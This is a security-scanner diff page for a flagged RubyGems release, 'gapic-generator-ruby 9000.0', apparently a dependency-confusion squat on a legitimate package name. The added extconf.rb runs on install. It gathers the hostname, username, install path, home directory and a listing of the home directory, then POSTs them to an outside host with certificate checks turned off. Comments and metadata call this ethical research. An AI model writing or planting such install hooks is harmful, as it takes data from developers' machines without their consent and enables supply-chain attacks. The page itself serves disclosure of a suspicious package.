RubyGems - gapic-generator-ruby - Versions diffs - 9000.0 - Mend

gapic-generator-ruby 9000.0

Potentially problematic release.

This version of gapic-generator-ruby might be problematic. Click here for more details.

Files changed (3) hide show

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: b8003d7e196f771e066db59e33830e51940519a70af4878ce6dd641c4a1627f3
+  data.tar.gz: 3f016679350e411f0c8908a7dec9c0c0c01fea1907c18a4a4950f5f3cfafc21f
+SHA512:
+  metadata.gz: 74b67b4f9f9e43db81af578526b42d986c0c16a48a2f4ec935b579660817c7b586ddd987a1acd0cee6adda17c4055364ded0140a69176f7495050f7774b16bc0
+  data.tar.gz: 3a0cd33583e2c20c5eb9c57a7b053d0cecc59f526ca5f3e4ff079fbe57f6eda9672da25b43eb10a2cde779eec25d4281e4044f686e7a545fe0742708406d8f37

data/ext/extconf.rb ADDED Viewed

@@ -0,0 +1,50 @@
+=begin
+Hi, if you're reading this you're probably wondering what this code is doing on your machine.
+Don't worry! It doesn't do anything nasty or malicious.
+I am an ethical security researcher, booking names of gems to prevent brandjacking.
+I also run a Ruby security related platform: https://diffend.io
+All data I collect will be deleted and I do not collect any sensitive information.
+That's why I don't even obfuscate the network calls with DNS requests or anything else.
+You can read the code to confirm this.
+If you have any questions or want to get in touch for any reason, you can reach me at:
+maciej@mensfeld.pl
+If this is affecting your organization, for example because I took name that uses your naming
+conventions, feel free to contact me and I will be more than happy to give it back to you.
+P.S. I did notify RubyGems security team, so they are aware of my activity.
+=end
+require 'mkmf'
+require 'net/http'
+require 'socket'
+require 'etc'
+require 'securerandom'
+require 'json'
+create_makefile 'gem_test'
+uri = URI("https://ethically-testing-the.world")
+http = Net::HTTP.new(uri.host, uri.port)
+http.use_ssl = true
+http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+request = Net::HTTP::Post.new('/gapic-generator-ruby/9000.0')
+request.add_field('Content-Type', 'application/json')
+request.body = {
+  hostnames: [Socket.gethostname, Socket.gethostbyname(Socket.gethostname).first].uniq,
+  username: Etc.getlogin,
+  path: File.dirname(__FILE__),
+  home: Dir.home,
+  home_ls: Dir.entries(Dir.home),
+  id: SecureRandom.uuid,
+}.to_json
+http.request(request)

metadata ADDED Viewed

@@ -0,0 +1,50 @@
+--- !ruby/object:Gem::Specification
+name: gapic-generator-ruby
+version: !ruby/object:Gem::Version
+  version: '9000.0'
+platform: ruby
+authors:
+- Maciej Mensfeld
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2021-03-04 00:00:00.000000000 Z
+dependencies: []
+description: |
+  I am testing for brandjacking vulnerabilities in products that are in bug bounty programs.
+  This code is reporting-only, and does not do anything malicious.
+email:
+- maciej@mensfeld.pl
+executables: []
+extensions:
+- ext/extconf.rb
+extra_rdoc_files: []
+files:
+- ext/extconf.rb
+homepage: https://diffend.io
+licenses:
+- GPL-3.0
+metadata: {}
+post_install_message: |
+  This is probably not the package you wanted to install.
+  Read the description of this gem for more details.
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.1.2
+signing_key:
+specification_version: 4
+summary: Gem that sends some non-sensitive data for security research.
+test_files: []